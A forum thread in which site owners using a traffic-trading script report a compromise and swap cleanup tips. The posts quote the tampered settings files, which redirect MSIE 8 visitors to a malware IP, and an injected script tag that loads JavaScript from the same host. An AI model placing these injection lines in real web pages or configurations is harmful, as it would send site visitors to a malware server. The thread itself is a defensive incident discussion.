Author Topic: A new hack? User agent hack?  (Read 29097 times)

0 Members and 1 Guest are viewing this topic.

Offline Shoplifter

  • Newbie
  • *
  • Posts: 48
    • View Profile
A new hack? User agent hack?
« on: April 25, 2014, 08:58:23 PM »
Nearly every one of my TP sites now seems to have files  /tp/data/settings/ modified to add a virus site.

For example:

/tp/data/settings/out_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/outconf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}
/tp/data/settings/in_conf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/out_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}

I gather that this may redirect that particular user agent to the attack site. In fact the user agent redirect setting in both the in and out areas of the tp control panel are selected.
It seems that the attacker has added a record to the data files in /tp/data/settings to do this. These files are all chmod 777 even if the TP install is locked. Classy stuff, whoever did this knows the software well.

Offline ip0li

  • mgSearkGD
  • Administrator
  • Hero Member
  • *****
  • Posts: 1963
    • View Profile
    • Pretty Girls from your city for night
Re: A new hack? User agent hack?
« Reply #1 on: April 27, 2014, 06:30:20 AM »
sent to kildoozer, I checked mine and 10 other clients sites and they look clean(regarding your tp forum topic), so it must be isolated thing, if files are locked its impossible to change them with script, only with ftp/ssh access!

Offline Kildoozer

  • Administrator
  • Sr. Member
  • *****
  • Posts: 420
    • View Profile
Re: A new hack? User agent hack?
« Reply #2 on: April 27, 2014, 10:04:41 AM »
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.

Offline Shoplifter

  • Newbie
  • *
  • Posts: 48
    • View Profile
Re: A new hack? User agent hack?
« Reply #3 on: April 27, 2014, 11:12:56 AM »
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.

Sending now.

I cleaned it out by going into the admin and disabling the redirects. So far so good. I double checked the lock and ran lock.php again but the files in /data/settings are all 777



« Last Edit: April 27, 2014, 11:14:49 AM by Shoplifter »

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #4 on: May 18, 2014, 11:27:14 AM »
Im getting the same, now google has put a warning next to my site in the search engine , webmaster tools saying it has malware, mainly this! <script type="text/javascript" src="http://37.9.53.204/mobile.php?niche=js">


Offline Nosik

  • Newbie
  • *
  • Posts: 7
    • View Profile
Re: A new hack? User agent hack?
« Reply #5 on: May 18, 2014, 01:22:25 PM »
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #6 on: May 18, 2014, 02:06:45 PM »
How do you clean it out?

Offline Nosik

  • Newbie
  • *
  • Posts: 7
    • View Profile
Re: A new hack? User agent hack?
« Reply #7 on: May 18, 2014, 09:25:42 PM »
How do you clean it out?
Just deleted "Redirect by User Agent" in Settings -> IN and Settings -> Out. Then deleted iframe code from Tools -> Toplists -> top.html. Then I went to google webmasters tools and sent the request to rescan my sites to delete the virus warning (and they have approved it).

But we need to close this backdoor.

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #8 on: May 19, 2014, 08:48:40 AM »
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers

Offline Nosik

  • Newbie
  • *
  • Posts: 7
    • View Profile
Re: A new hack? User agent hack?
« Reply #9 on: May 19, 2014, 01:05:57 PM »
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #10 on: May 20, 2014, 08:26:30 AM »
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".

Thing is it has always been unchecked...

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #11 on: May 20, 2014, 09:02:02 AM »
My traffic has halved and do not know where to look or how to get rid of it! Thanks for the help so far guys :)

Update: Untill TP get this sorted have taken the trade pulse include out of my site for now, until it safe to put back, have resubmitted site to google...waiting to see if they approve it!
« Last Edit: May 20, 2014, 10:34:05 AM by skyblue »

Offline skyblue

  • Newbie
  • *
  • Posts: 24
    • View Profile
Re: A new hack? User agent hack?
« Reply #12 on: May 20, 2014, 12:50:22 PM »
Ok found the code in my toplist template, just deleted it hoping its clean for now!

Offline Bryan

  • Jr. Member
  • **
  • Posts: 69
    • View Profile
Re: A new hack? User agent hack?
« Reply #13 on: May 22, 2014, 02:21:24 PM »
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
I unchecked it, and hit submit, it went through google warning, i clicked "ignore" and went ahead, the "Redirect by User Agent" came checked again. any idea?

Offline Shoplifter

  • Newbie
  • *
  • Posts: 48
    • View Profile
Re: A new hack? User agent hack?
« Reply #14 on: May 23, 2014, 12:31:37 AM »
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?

That is a good question. I feel the attacker is getting in through some sort of back door, I can't believe he managed to get the admin passes for my sites as well as for other TP users.